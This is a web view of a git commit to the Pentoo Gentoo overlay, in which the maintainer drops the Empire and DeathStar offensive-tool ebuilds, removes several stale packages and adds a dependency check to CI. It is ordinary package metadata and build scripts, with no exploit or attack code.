Backup_Repos/pentoo-overlay
1
0
Fork 0
mirror of https://github.com/pentoo/pentoo-overlay synced 2025-12-06 08:25:01 +01:00
Code Issues Projects Releases Wiki Activity

Clean the tree of non-existant deps and check now

Browse source 
pentoo-exploits: drop empire (and deathstar)
Also drop keywords from empire since it can't be installed.
also drop deathstar and it's keywords since it requires empire
sdrtrunk: fix non-existant deps
remove freeradius
bump icad-tone-detection
pydub: import from guru
drop dependency-check-bin
drop old grpcio-tools
update evalhook
drop openscap-daemon, nothing but "random" for years
This commit is contained in:
Rick Farina (Zero_Chaos) 2025-04-26 12:49:59 -04:00
parent c3e707608e
commit 9ea45d02fd
No known key found for this signature in database
GPG key ID: A29433C0AA431DDC
50 changed files with 76 additions and 3068 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
.github/workflows/pkgcheck.yaml vendored
View file

@ -25,4 +25,4 @@ jobs:
- name: Commit pkgcheck warnings - name: Commit pkgcheck warnings
uses: pkgcore/pkgcheck-action@v1 uses: pkgcore/pkgcheck-action@v1
with: with:
args: --exit warning -k ,PkgMetadataXmlIndentation,-NonsolvableDepsInStable,-NonsolvableDepsInDev,-PotentialStable,-DeprecatedDep,-MissingUseDepDefault,ProfileError,ProfileWarning,UnknownProfilePackageUse,OldPackageUpdate,OldMultiMovePackageUpdate,LaggingProfileEapi,UnknownProfilePackageKeywords,-UnusedProfileDirs,EclassReservedName,VisibleVcsPkg,DeprecatedEapi,MissingRemoteId,DistutilsNonPEP517Build,OldPackageNameDep --commits HEAD^..${{ github.sha }} args: --exit warning -k ,PkgMetadataXmlIndentation,-NonsolvableDepsInStable,-NonsolvableDepsInDev,-PotentialStable,-DeprecatedDep,-MissingUseDepDefault,ProfileError,ProfileWarning,UnknownProfilePackageUse,OldPackageUpdate,OldMultiMovePackageUpdate,LaggingProfileEapi,UnknownProfilePackageKeywords,-UnusedProfileDirs,EclassReservedName,VisibleVcsPkg,DeprecatedEapi,MissingRemoteId,DistutilsNonPEP517Build,OldPackageNameDep,NonexistentDeps --commits HEAD^..${{ github.sha }}

2
.github/workflows/pkgcheck_merge.yaml vendored
View file

@ -26,4 +26,4 @@ jobs:
- name: Commit pkgcheck warnings - name: Commit pkgcheck warnings
uses: pkgcore/pkgcheck-action@v1 uses: pkgcore/pkgcheck-action@v1
with: with:
args: --exit warning -k ,PkgMetadataXmlIndentation,-NonsolvableDepsInStable,-NonsolvableDepsInDev,-PotentialStable,-UnknownProfilePackage,-DeprecatedDep,-MissingUseDepDefault,ProfileError,ProfileWarning,UnknownProfilePackageUse,OldPackageUpdate,OldMultiMovePackageUpdate,LaggingProfileEapi,UnknownProfilePackageKeywords,-UnusedProfileDirs,EclassReservedName,VisibleVcsPkg,DeprecatedEapi,MissingRemoteId,DistutilsNonPEP517Build,OldPackageNameDep --commits HEAD^..${{ github.sha }} args: --exit warning -k ,PkgMetadataXmlIndentation,-NonsolvableDepsInStable,-NonsolvableDepsInDev,-PotentialStable,-UnknownProfilePackage,-DeprecatedDep,-MissingUseDepDefault,ProfileError,ProfileWarning,UnknownProfilePackageUse,OldPackageUpdate,OldMultiMovePackageUpdate,LaggingProfileEapi,UnknownProfilePackageKeywords,-UnusedProfileDirs,EclassReservedName,VisibleVcsPkg,DeprecatedEapi,MissingRemoteId,DistutilsNonPEP517Build,OldPackageNameDep,NonexistentDeps --commits HEAD^..${{ github.sha }}

1
app-exploits/deathstar/Manifest
View file

@ -1,2 +1 @@
DIST deathstar-20201217.tar.gz 44220 BLAKE2B ba1e9c295a76201c7987e7759cb3c8ecd2c212f6269ef2fc3392db2ef2cb993fa2af860f29e514f580940b9b02ee7dc777747924e961aad72365b8970bdd337e SHA512 4af3b356e548be04ea03989af7c43e302cf1b2c4ec7c10fedf7d4fb6d426bcfe947bbb42312912505c88cbd0e21705fd41d279bbb048f7fa5450f25ddd58f2b7
DIST deathstar-20210519.tar.gz 44204 BLAKE2B 186951fde53ea132cf6bbe35f478b0e97e2163665e599f29666ce291a58744d4c33a463aea75f668a41a68b45c06210ebec7870a01b45fb712693e638e9a445c SHA512 2029c49432f273fc7534d98114075dca4330d8900835e2d754fc021e7b0844a092a9818389e8d86f58f30206b60991394b7bd3ed222343ebab92522e74a12b2c DIST deathstar-20210519.tar.gz 44204 BLAKE2B 186951fde53ea132cf6bbe35f478b0e97e2163665e599f29666ce291a58744d4c33a463aea75f668a41a68b45c06210ebec7870a01b45fb712693e638e9a445c SHA512 2029c49432f273fc7534d98114075dca4330d8900835e2d754fc021e7b0844a092a9818389e8d86f58f30206b60991394b7bd3ed222343ebab92522e74a12b2c

61
app-exploits/deathstar/deathstar-20201217-r1.ebuild
View file

@ -1,61 +0,0 @@
# Copyright 1999-2022 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
DISTUTILS_USE_PEP517=poetry
PYTHON_COMPAT=( python3_{11..13} )
inherit distutils-r1
DESCRIPTION="A tool to gain Domain Admin rights with a push of a button"
HOMEPAGE="https://github.com/byt3bl33d3r/DeathStar"
HASH_COMMIT="1ced058fcbd73e89f13967cbadc1d375dc48f1d1"
SRC_URI="https://github.com/byt3bl33d3r/DeathStar/archive/${HASH_COMMIT}.tar.gz -> ${P}.tar.gz"
KEYWORDS="~amd64 ~x86"
LICENSE="GPL-3"
SLOT="0"
#requirements.txt
RDEPEND="${PYTHON_DEPS}
app-exploits/empire
dev-python/certifi[${PYTHON_USEDEP}]
dev-python/colorama[${PYTHON_USEDEP}]
dev-python/commonmark[${PYTHON_USEDEP}]
dev-python/h11[${PYTHON_USEDEP}]
dev-python/httpcore[${PYTHON_USEDEP}]
dev-python/httpx[${PYTHON_USEDEP}]
dev-python/idna[${PYTHON_USEDEP}]
dev-python/pygments[${PYTHON_USEDEP}]
dev-python/rfc3986[${PYTHON_USEDEP}]
dev-python/rich[${PYTHON_USEDEP}]
dev-python/sniffio[${PYTHON_USEDEP}]
dev-python/typing-extensions[${PYTHON_USEDEP}]
"
S="${WORKDIR}/DeathStar-${HASH_COMMIT}"
src_prepare() {
default
# exclude is not supported by pyproject2setuppy
sed -i '/^exclude/,/^\]/d' pyproject.toml || die
}
#src_prepare() {
# sed -i \
# -e "s/__version__ = '\(.*\)'/__version__ = '${PV}'/" \
# DeathStar.py || die
# default
#}
#src_install() {
# python_foreach_impl python_newscript DeathStar.py $PN
# dodoc README.md
#}
pkg_postinst() {
einfo "\nSee the following URL:"
einfo " * https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html\n"
}

8
app-exploits/deathstar/deathstar-20210519.ebuild
View file

@ -1,4 +1,4 @@
# Copyright 1999-2022 Gentoo Authors # Copyright 1999-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -14,7 +14,9 @@ HOMEPAGE="https://github.com/byt3bl33d3r/DeathStar"
HASH_COMMIT="f10fdbfeb149d9b5647b397e1ce7fa8ab0d39799" HASH_COMMIT="f10fdbfeb149d9b5647b397e1ce7fa8ab0d39799"
SRC_URI="https://github.com/byt3bl33d3r/DeathStar/archive/${HASH_COMMIT}.tar.gz -> ${P}.tar.gz" SRC_URI="https://github.com/byt3bl33d3r/DeathStar/archive/${HASH_COMMIT}.tar.gz -> ${P}.tar.gz"
KEYWORDS="~amd64 ~x86" S="${WORKDIR}/DeathStar-${HASH_COMMIT}"
#KEYWORDS="~amd64 ~x86"
LICENSE="GPL-3" LICENSE="GPL-3"
SLOT="0" SLOT="0"
@ -42,8 +44,6 @@ RDEPEND="${PYTHON_DEPS}
distutils_enable_tests pytest distutils_enable_tests pytest
S="${WORKDIR}/DeathStar-${HASH_COMMIT}"
src_prepare() { src_prepare() {
default default
# exclude is not supported by pyproject2setuppy # exclude is not supported by pyproject2setuppy

3
app-exploits/deathstar/metadata.xml
View file

@ -5,4 +5,7 @@
<email>unknown@pentoo.ch</email> <email>unknown@pentoo.ch</email>
<name>Author Unknown</name> <name>Author Unknown</name>
</maintainer> </maintainer>
<upstream>
<remote-id type="github">byt3bl33d3r/DeathStar</remote-id>
</upstream>
</pkgmetadata> </pkgmetadata>

1
app-exploits/empire/Manifest
View file

@ -1,2 +1 @@
DIST empire-6.0.0.tar.gz 38108157 BLAKE2B f53ced8e3a90f51018ddd469455e0c165fb7af8aab769b2b75570dc2a2f814900d097988c208102b911896cb3b31b53e92119dfce3af20dbb7c2e307fc3ee5c6 SHA512 8de2ca9c46cf0c324dcf407b152e0dc0079078b9d771dda885e93b75645ea81eb335a2eb72a7f41995d56855abed0c58687ab63a5a8ff419b9b431b533215c8a
DIST empire-6.0.2.tar.gz 38107974 BLAKE2B 7169a51aa22895a738d85b5ae18867dfb10f78e59ff65db82ba7fffc725c8590e7fdab902b943bc1a80a0f3a827c10fd3b63052b725774a388c7d9aab2be894b SHA512 448ff62446132d736c4a1a6bc2d8abb0168d8c32841ecf2073cf3577e906cc29ea7f09bb3d227e8a8da635f0f107f36cfeed50ddd48e4bdb237c3cc8ce3f99dc DIST empire-6.0.2.tar.gz 38107974 BLAKE2B 7169a51aa22895a738d85b5ae18867dfb10f78e59ff65db82ba7fffc725c8590e7fdab902b943bc1a80a0f3a827c10fd3b63052b725774a388c7d9aab2be894b SHA512 448ff62446132d736c4a1a6bc2d8abb0168d8c32841ecf2073cf3577e906cc29ea7f09bb3d227e8a8da635f0f107f36cfeed50ddd48e4bdb237c3cc8ce3f99dc

137
app-exploits/empire/empire-6.0.0.ebuild
View file

@ -1,137 +0,0 @@
# Copyright 1999-2024 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
DISTUTILS_USE_PEP517=poetry
PYTHON_COMPAT=( python3_{11..13} )
PYTHON_REQ_USE="sqlite"
inherit wrapper python-single-r1
DESCRIPTION="A post-exploitation framework"
HOMEPAGE="https://github.com/BC-SECURITY/Empire"
SRC_URI="https://github.com/BC-SECURITY/Empire/archive/v${PV}.tar.gz -> ${P}.tar.gz"
S="${WORKDIR}/Empire-${PV}"
LICENSE="BSD"
SLOT="0"
KEYWORDS="~amd64 ~x86"
IUSE="powershell java"
REQUIRED_USE="powershell? ( !x86 )
${PYTHON_REQUIRED_USE}"
# https://github.com/BC-SECURITY/Empire/issues/196
RDEPEND="${PYTHON_DEPS}
$(python_gen_cond_dep '
dev-python/urllib3[${PYTHON_USEDEP}]
dev-python/requests[${PYTHON_USEDEP}]
dev-python/macholib[${PYTHON_USEDEP}]
dev-python/pyopenssl[${PYTHON_USEDEP}]
dev-python/zlib_wrapper[${PYTHON_USEDEP}]
dev-python/jinja2[${PYTHON_USEDEP}]
dev-python/pyparsing[${PYTHON_USEDEP}]
dev-python/pymysql[${PYTHON_USEDEP}]
dev-python/sqlalchemy[${PYTHON_USEDEP}]
dev-python/pyyaml[${PYTHON_USEDEP}]
dev-python/sqlalchemy_utc[${PYTHON_USEDEP}]
dev-python/terminaltables3[${PYTHON_USEDEP}]
dev-python/pycryptodome[${PYTHON_USEDEP}]
dev-python/cryptography[${PYTHON_USEDEP}]
>=dev-python/fastapi-0.115.11[${PYTHON_USEDEP}]
>=dev-python/uvicorn-0.34.0[${PYTHON_USEDEP}]
>=dev-python/jq-1.8.0[${PYTHON_USEDEP}]
>=dev-python/aiofiles-24.1.0[${PYTHON_USEDEP}]
>=dev-python/python-multipart-0.0.20[${PYTHON_USEDEP}]
>=dev-python/python-socketio-5.12.1[${PYTHON_USEDEP}]
>=dev-python/flask-3.1.0[${PYTHON_USEDEP}]
>=dev-python/python-obfuscator-0.0.2[${PYTHON_USEDEP}]
>=dev-python/pyinstaller-6.12.0[${PYTHON_USEDEP}]
>=dev-python/packaging-24.2[${PYTHON_USEDEP}]
>=dev-python/netaddr-1.3.0[${PYTHON_USEDEP}]
>=dev-python/bcrypt-4.0.1[${PYTHON_USEDEP}]
>=dev-python/requests-file-2.1.0[${PYTHON_USEDEP}]
dev-python/pysecretsocks[${PYTHON_USEDEP}]
dev-python/donut-shellcode[${PYTHON_USEDEP}]
')
powershell? (
!x86? ( app-shells/pwsh-bin ) )
java? (
|| ( virtual/jre:* virtual/jdk:* ) )"
DEPEND="${RDEPEND}"
pkg_setup() {
python-single-r1_pkg_setup
}
src_prepare() {
python_fix_shebang "${S}"
default
}
#https://github.com/BC-SECURITY/Empire/issues/39
src_install() {
insinto "/usr/share/${PN}"
doins -r empire/ empire.py
# python_optimize "${D}/usr/share/${PN}/lib"
make_wrapper $PN \
"${PYTHON} /usr/share/${PN}/empire.py" \
"/usr/share/${PN}"
dodoc README.md Dockerfile changelog
}
pkg_config() {
local _yesno_ask
local _em_home="${EROOT}/usr/share/${PN}"
pushd "${_em_home}" >/dev/null || die
if [ -f "${_em_home}/data/empire.db" ]; then
ewarn "Drop old database "${_em_home}/data/empire.db" for new configuring ..."
read -r -p " [>] Are you sure? [y/N] " _yesno_ask
if [[ ${_yesno_ask,,} =~ ^(yes|y)$ ]]; then
rm -f data/empire.db > /dev/null 2>&1 || die
else
return
fi
fi
ebegin "Press ENTER to create password for database or Control-C to abort now"
python3 setup/setup_database.py
eend ${?} || die
if [ -f "${_em_home}/data/empire-chain.pem" ] || [ -f "${_em_home}/data/empire-priv.key" ]; then
ewarn "Drop old ${_em_home}/data/empire-chain.pem and generate new cert ..."
read -r -p " [>] Are you sure? [y/N] " _yesno_ask
if [[ ${_yesno_ask,,} =~ ^(yes|y)$ ]]; then
rm -f data/{empire-chain.pem,empire-priv.key} > /dev/null 2>&1 || die
else
return
fi
fi
openssl req -newkey rsa:2048 -new -nodes -x509 \
-subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.pentoo.ch" \
-keyout data/empire-priv.key \
-out data/empire-chain.pem || die
popd >/dev/null || die
}
pkg_postinst() {
ewarn "\nWarning. This software does not support system-wide installation"
ewarn "See the following bug report for more details:"
ewarn "https://github.com/BC-SECURITY/Empire/issues/39"
ewarn
ewarn "You need to run it from /usr/share/${PN} directory under 'root' account"
ewarn "\nPlease configure your installation before using:"
ewarn " emerge --config \"=${CATEGORY}/${PF}\"\n"
}

4
app-exploits/empire/empire-6.0.2.ebuild
View file

@ -1,4 +1,4 @@
# Copyright 1999-2024 Gentoo Authors # Copyright 1999-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -16,7 +16,7 @@ S="${WORKDIR}/Empire-${PV}"
LICENSE="BSD" LICENSE="BSD"
SLOT="0" SLOT="0"
KEYWORDS="~amd64 ~x86" #KEYWORDS="~amd64 ~x86"
IUSE="powershell java" IUSE="powershell java"
REQUIRED_USE="powershell? ( !x86 ) REQUIRED_USE="powershell? ( !x86 )
${PYTHON_REQUIRED_USE}" ${PYTHON_REQUIRED_USE}"

1
app-forensics/openscap-daemon/Manifest
View file

@ -1 +0,0 @@
DIST openscap-daemon-0.1.10.tar.gz 820662 BLAKE2B 1167518f0534dc9f494f889892acbf7d74a86af6caf22220345516c39ed4863cbdd0a4064d9ee291ed7eccd81ab057241db2b04ee28d79a0c1f3c5152154e8a9 SHA512 93946b390cc95281b606967df783b8be6beb83da9fbca1951f2095dc24abe518440b6f967b29ae2b093536abe9af4effc3776e8d30f0ab2193b923c1bcf54e17

15
app-forensics/openscap-daemon/files/openscap-daemon-0.1.10_gentoo.patch
View file

@ -1,15 +0,0 @@
diff -ur a/setup.py b/setup.py
--- a/setup.py 2018-02-08 18:52:16.000000000 +0300
+++ b/setup.py 2019-07-07 00:50:24.699965784 +0300
@@ -57,10 +57,8 @@
data_files=[
(os.path.join("/", "etc", "dbus-1", "system.d"),
["org.oscapd.conf"]),
- (os.path.join("/", "usr", "lib", "systemd", "system"),
+ (os.path.join("/", "lib", "systemd", "system"),
["oscapd.service"]),
- (os.path.join("/", "usr", "share", "doc", "openscap-daemon"),
- ["README.md", "LICENSE"]),
(os.path.join("/", "usr", "share", "man", "man8"),
["man/oscapd.8", "man/oscapd-cli.8", "man/oscapd-evaluate.8"]),
],

11
app-forensics/openscap-daemon/files/oscapd.initd
View file

@ -1,11 +0,0 @@
#!/sbin/openrc-run
# Copyright 1999-2019 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
description="OpenSCAP Daemon"
command="/usr/bin/oscapd"
command_background="true"
pidfile="/run/${RC_SVCNAME}.pid"
start_stop_daemon_args="--quiet -1 /var/log/${RC_SVCNAME}.log -2 /var/log/${RC_SVCNAME}.log"
# vim: set ft=gentoo-init-d ts=4 :

8
app-forensics/openscap-daemon/metadata.xml
View file

@ -1,8 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="person">
<email>email@linxon.ru</email>
<name>Yury Martynov</name>
</maintainer>
</pkgmetadata>

44
app-forensics/openscap-daemon/openscap-daemon-0.1.10-r1.ebuild
View file

@ -1,44 +0,0 @@
# Copyright 1999-2020 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
DISTUTILS_USE_PEP517=setuptools
PYTHON_COMPAT=( python3_{11..13} )
PYTHON_REQ_USE="xml"
inherit distutils-r1
DESCRIPTION="Manages continuous scans of your infrastructure"
HOMEPAGE="https://www.open-scap.org/tools/openscap-daemon"
SRC_URI="https://github.com/OpenSCAP/openscap-daemon/archive/${PV}.tar.gz -> ${P}.tar.gz"
LICENSE="LGPL-2.1"
SLOT=0
KEYWORDS="~amd64"
IUSE="test"
REQUIRED_USE="${PYTHON_REQUIRED_USE}"
RESTRICT="!test? ( test )"
RDEPEND="${PYTHON_DEPS}
app-forensics/openscap
app-forensics/scap-security-guide
dev-python/dbus-python[${PYTHON_USEDEP}]
dev-python/pygobject[${PYTHON_USEDEP}]"
PATCHES=( "${FILESDIR}"/${P}_gentoo.patch )
src_test() {
tests/unit/make_check || die
tests/integration/make_check || die
}
src_install() {
distutils-r1_src_install
newinitd "${FILESDIR}"/oscapd.initd oscapd
keepdir "/var/lib/oscapd" "/etc/oscapd"
dodoc container/config.ini
}

11
dev-php/evalhook/evalhook-0.1_p20231013.ebuild
View file

@ -1,4 +1,4 @@
# Copyright 1999-2023 Gentoo Foundation # Copyright 1999-2025 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
EAPI=8 EAPI=8
@ -7,7 +7,7 @@ HASH_COMMIT="bf63f72a0ead21a0ffb9c2ed4c791262ed55a07c"
MY_S="${WORKDIR}/php-eval-hook-${HASH_COMMIT}" MY_S="${WORKDIR}/php-eval-hook-${HASH_COMMIT}"
PHP_EXT_NAME=evalhook PHP_EXT_NAME=evalhook
USE_PHP="php8-1 php8-2" USE_PHP="php8-2"
PHP_EXT_S="${MY_S}" PHP_EXT_S="${MY_S}"
inherit php-ext-source-r3 inherit php-ext-source-r3
@ -15,15 +15,10 @@ DESCRIPTION="Decode/Deobfuscate PHP Scripts"
HOMEPAGE="https://github.com/extremecoders-re/php-eval-hook" HOMEPAGE="https://github.com/extremecoders-re/php-eval-hook"
SRC_URI="https://github.com/extremecoders-re/php-eval-hook/archive/${HASH_COMMIT}.tar.gz -> ${P}.gh.tar.gz" SRC_URI="https://github.com/extremecoders-re/php-eval-hook/archive/${HASH_COMMIT}.tar.gz -> ${P}.gh.tar.gz"
S="${MY_S}"
LICENSE="MIT" LICENSE="MIT"
SLOT="0" SLOT="0"
KEYWORDS="~amd64" KEYWORDS="~amd64"
IUSE=""
RDEPEND=""
DEPEND="${RDEPEND}"
S="${MY_S}"
src_prepare() { src_prepare() {
php-ext-source-r3_src_prepare php-ext-source-r3_src_prepare

11
dev-php/evalhook/metadata.xml Normal file
View file

@ -0,0 +1,11 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "https://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="person">
<name>No one</name>
<email>noone@pentoo.org</email>
</maintainer>
<upstream>
<remote-id type="github">extremecoders-re/php-eval-hook</remote-id>
</upstream>
</pkgmetadata>

2
dev-python/grpcio-testing/Manifest
View file

@ -1 +1 @@
DIST grpcio-testing-1.62.0.tar.gz 22474 BLAKE2B 6c8c23eb4d7c645278496067a74583ce930eb16f39a262ce8b45f1029d6d6bf97ff6dab305f27bea4f4d5333a74fa185957d33499b49f02b711eb94cab0ff065 SHA512 6285a5c5b28114969738e1815327c14651ee2bc2e6b6c4093cea980ae2ad3f0aa8d53fc7b1e9125e5c47862c66891129e6420ad0d6896a2f789ca7e9fc66ce43 DIST grpcio_testing-1.71.0.tar.gz 22483 BLAKE2B 0c935103785d229502646be2ecc936e64d0046a5a0b1b3dfee5a65aee74342b0177a2b614cb0f7f2e3ecf646ef0360a205c5ea5164a5af7f24ea1392ff802bb5 SHA512 71f6b1a33ca5e7b374c7a3d637518d82e743c7da09e689877dc1c94ab346b4d0e602d626544aa7f25a415474b3330ceda162a56465586b91d016c96aa01483e5

2
dev-python/grpcio-testing/grpcio-testing-1.62.0.ebuild → dev-python/grpcio-testing/grpcio-testing-1.71.0.ebuild
View file

@ -6,7 +6,7 @@ EAPI=8
DISTUTILS_USE_PEP517=setuptools DISTUTILS_USE_PEP517=setuptools
PYTHON_COMPAT=( python3_{11..13} ) PYTHON_COMPAT=( python3_{11..13} )
DISTUTILS_USE_PEP517=setuptools DISTUTILS_USE_PEP517=setuptools
PYPI_NO_NORMALIZE=1 PYPI_PN="grpcio_testing"
inherit distutils-r1 pypi inherit distutils-r1 pypi

9
dev-python/grpcio-testing/metadata.xml
View file

@ -1,9 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "https://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<!-- maintainer-needed -->
<upstream>
<remote-id type="github">grpc/grpc</remote-id>
<remote-id type="pypi">grpcio-testing</remote-id>
</upstream>
</pkgmetadata>

1
dev-python/grpcio-tools/Manifest
View file

@ -1,2 +1 @@
DIST grpcio_tools-1.67.0.tar.gz 5159163 BLAKE2B 54a7db77514033c4747d20a13fded114828fed23f649587c649f5ad2716d4bb31b80eeda560d55ae087a564cb9d34563a612cc91df581ae6b9a761f307828397 SHA512 f9644b4424aa68f1ae4d679c7b635db9bbfc0b493c76caf7d2e9fe0a49e5e81b6f146666c8dba3fc1d1c0db141f8fb362dd0ede0842c34cb178009412a672ec5
DIST grpcio_tools-1.71.0.tar.gz 5326008 BLAKE2B 70dae192880c861e659f1901e00d7189637843c25c309791857fdc1ef58692fcd3a42d34587896b67d19b2a067561d0cc51e5c9f530352d5345fd06f00fea045 SHA512 33ec4c4a5f09e41af3c20cf030a16f69b8b9d0b8f107f84be6666afce026367d710c0fe4b383f3b45a56e3403fd4f23309ca16ea7d1a122245572868bf7a1507 DIST grpcio_tools-1.71.0.tar.gz 5326008 BLAKE2B 70dae192880c861e659f1901e00d7189637843c25c309791857fdc1ef58692fcd3a42d34587896b67d19b2a067561d0cc51e5c9f530352d5345fd06f00fea045 SHA512 33ec4c4a5f09e41af3c20cf030a16f69b8b9d0b8f107f84be6666afce026367d710c0fe4b383f3b45a56e3403fd4f23309ca16ea7d1a122245572868bf7a1507

58
dev-python/grpcio-tools/grpcio-tools-1.67.0.ebuild
View file

@ -1,58 +0,0 @@
# Copyright 1999-2024 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
DISTUTILS_EXT=1
PYTHON_COMPAT=( python3_{11..13} )
DISTUTILS_USE_PEP517=setuptools
inherit distutils-r1 multiprocessing prefix pypi
DESCRIPTION="Protobuf code generator for gRPC"
HOMEPAGE="https://grpc.io"
LICENSE="Apache-2.0"
SLOT="0"
KEYWORDS="amd64 ~arm ~arm64 ~x86"
RDEPEND="
~dev-python/grpcio-${PV}[${PYTHON_USEDEP}]
>=dev-python/protobuf-5.26.1[${PYTHON_USEDEP}]
<dev-python/protobuf-6[${PYTHON_USEDEP}]
"
DEPEND="${RDEPEND}"
BDEPEND="
virtual/pkgconfig
dev-python/cython[${PYTHON_USEDEP}]
"
python_prepare_all() {
distutils-r1_python_prepare_all
hprefixify setup.py
#absl/base/config.h ABSL_LTS_RELEASE_VERSION
# system: 20240722
#google/protobuf/wrappers.pb.h
# Protobuf C++ Version: 5.28.0
# PROTOBUF_VERSION
# protobuf/compiler/versions.h
# #define PROTOBUF_CPP_VERSION_STRING
# use system protobuf
# sed -r -i \
# -e '/^CC_FILES=\[/,/\]/{/^CC_FILES=\[/n;/\]/!d;}' \
# -e '/^CC_INCLUDES=\[/,/\]/{/^CC_INCLUDES=\[/n;/\]/!d;}' \
# -e "s@^(PROTO_INCLUDE=')[^']+'@\1/usr/include'@" \
# -e '/^PROTOBUF_SUBMODULE_VERSION=/d' \
# protoc_lib_deps.py
# fix the include path
# ln -s ../../../.. grpc_root
}
python_configure_all() {
export GRPC_PYTHON_BUILD_WITH_CYTHON=1
export GRPC_PYTHON_BUILD_EXT_COMPILER_JOBS="$(makeopts_jobs)"
}

38
dev-python/pydub/pydub-0.25.1.ebuild Normal file
View file

@ -0,0 +1,38 @@
# Copyright 2022-2025 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
PYTHON_COMPAT=( python3_{11..12} )
DISTUTILS_USE_PEP517=setuptools
inherit distutils-r1 optfeature
DESCRIPTION="Manipulate audio with an simple and easy high level interface"
HOMEPAGE="http://pydub.com/"
SRC_URI="https://github.com/jiaaro/${PN}/archive/refs/tags/v${PV}.tar.gz -> ${P}.tar.gz"
LICENSE="MIT"
SLOT="0"
KEYWORDS="~amd64"
IUSE="test"
RESTRICT="!test? ( test )"
BDEPEND="
test? (
media-video/ffmpeg[lame,vorbis]
)
"
distutils_enable_tests unittest
python_test() {
eunittest test/
}
pkg_postinst() {
optfeature "opening and saving non-wav files - like mp3" media-video/ffmpeg
#optfeature "playing audio" dev-python/simpleaudio # upstream suggests this, not available in gentoo or guru
optfeature "playing audio" dev-python/pyaudio
}

2
dev-util/dependency-check-bin/Manifest
View file

@ -1,2 +0,0 @@
DIST dependency-check-bin-5.3.2.zip 19997190 BLAKE2B 85f65246ebe0ecf80a2c5a1ed0dce6aa470cc5a6efd32f2feb7fd29f55c53a4a717cc9dfc8fdb39961a4c31a235649d5fa3508b1161f65a338375dc66b0e8324 SHA512 62fd9362004267867c423879ef26643971241908c3fffb7f6e563c930e16655bf3399009deda9d9c33069064cafa0cec3efb07e77ab3a52fa66b73dbc0ef172b
DIST dependency-check-bin-6.2.2.zip 27083228 BLAKE2B aa33e1714fab88ec2a1ac1be40d7f418d34a85a88d1609ffbca5b0b7439ede158ea24e4d1fa69b7a0b2f122da54a197dbfc1205d524344de8ac714e7393a2011 SHA512 55af3f6af69ae4e4de0653f1f735c2fd43455ce146f29d4d88c60014215f0f1be4a78953c2ea0fc62733f711723595f308d153e3cce0108f59c303833e5e762c

34
dev-util/dependency-check-bin/dependency-check-bin-5.3.2.ebuild
View file

@ -1,34 +0,0 @@
# Copyright 1999-2020 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
MY_PN="dependency-check"
DESCRIPTION="A utility that detects vulnerabilities in application dependencies"
HOMEPAGE="https://www.owasp.org/index.php/OWASP_Dependency_Check"
SRC_URI="https://dl.bintray.com/jeremy-long/owasp/dependency-check-${PV}-release.zip -> ${P}.zip"
LICENSE="Apache-2.0"
SLOT="0"
KEYWORDS="~amd64 ~x86"
IUSE=""
DEPEND=">=virtual/jdk-1.7
dev-java/ant-core
app-arch/unzip"
RDEPEND=">=virtual/jre-1.7"
S="${WORKDIR}/${MY_PN}"
src_prepare() {
sed -i -e 's|^PRGDIR=.*|PRGDIR="/etc/dependency-check"|' bin/${MY_PN}.sh || die "Sed failed!"
sed -i -e 's|^BASEDIR=`cd "$PRGDIR/.."|BASEDIR=`cd "$PRGDIR"|' bin/${MY_PN}.sh || die "Sed failed!"
eapply_user
}
src_install() {
dodir /etc/${MY_PN}
insinto /etc/${MY_PN}
doins -r lib plugins
newsbin bin/${MY_PN}.sh ${MY_PN}
}

34
dev-util/dependency-check-bin/dependency-check-bin-6.2.2.ebuild
View file

@ -1,34 +0,0 @@
# Copyright 1999-2021 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
MY_PN="dependency-check"
DESCRIPTION="A utility that detects vulnerabilities in application dependencies"
HOMEPAGE="https://www.owasp.org/index.php/OWASP_Dependency_Check"
SRC_URI="https://github.com/jeremylong/DependencyCheck/releases/download/v6.2.2/dependency-check-${PV}-release.zip -> ${P}.zip"
LICENSE="Apache-2.0"
SLOT="0"
KEYWORDS="~amd64 ~x86"
IUSE=""
DEPEND=">=virtual/jdk-1.7
dev-java/ant-core
app-arch/unzip"
RDEPEND=">=virtual/jre-1.7"
S="${WORKDIR}/${MY_PN}"
src_prepare() {
sed -i -e 's|^PRGDIR=.*|PRGDIR="/etc/dependency-check"|' bin/${MY_PN}.sh || die "Sed failed!"
sed -i -e 's|^BASEDIR=`cd "$PRGDIR/.."|BASEDIR=`cd "$PRGDIR"|' bin/${MY_PN}.sh || die "Sed failed!"
eapply_user
}
src_install() {
dodir /etc/${MY_PN}
insinto /etc/${MY_PN}
doins -r lib plugins
newsbin bin/${MY_PN}.sh ${MY_PN}
}

8
dev-util/dependency-check-bin/metadata.xml
View file

@ -1,8 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="person">
<email>unknown@pentoo.ch</email>
<name>Author Unknown</name>
</maintainer>
</pkgmetadata>

2
media-radio/icad-tone-detection/Manifest
View file

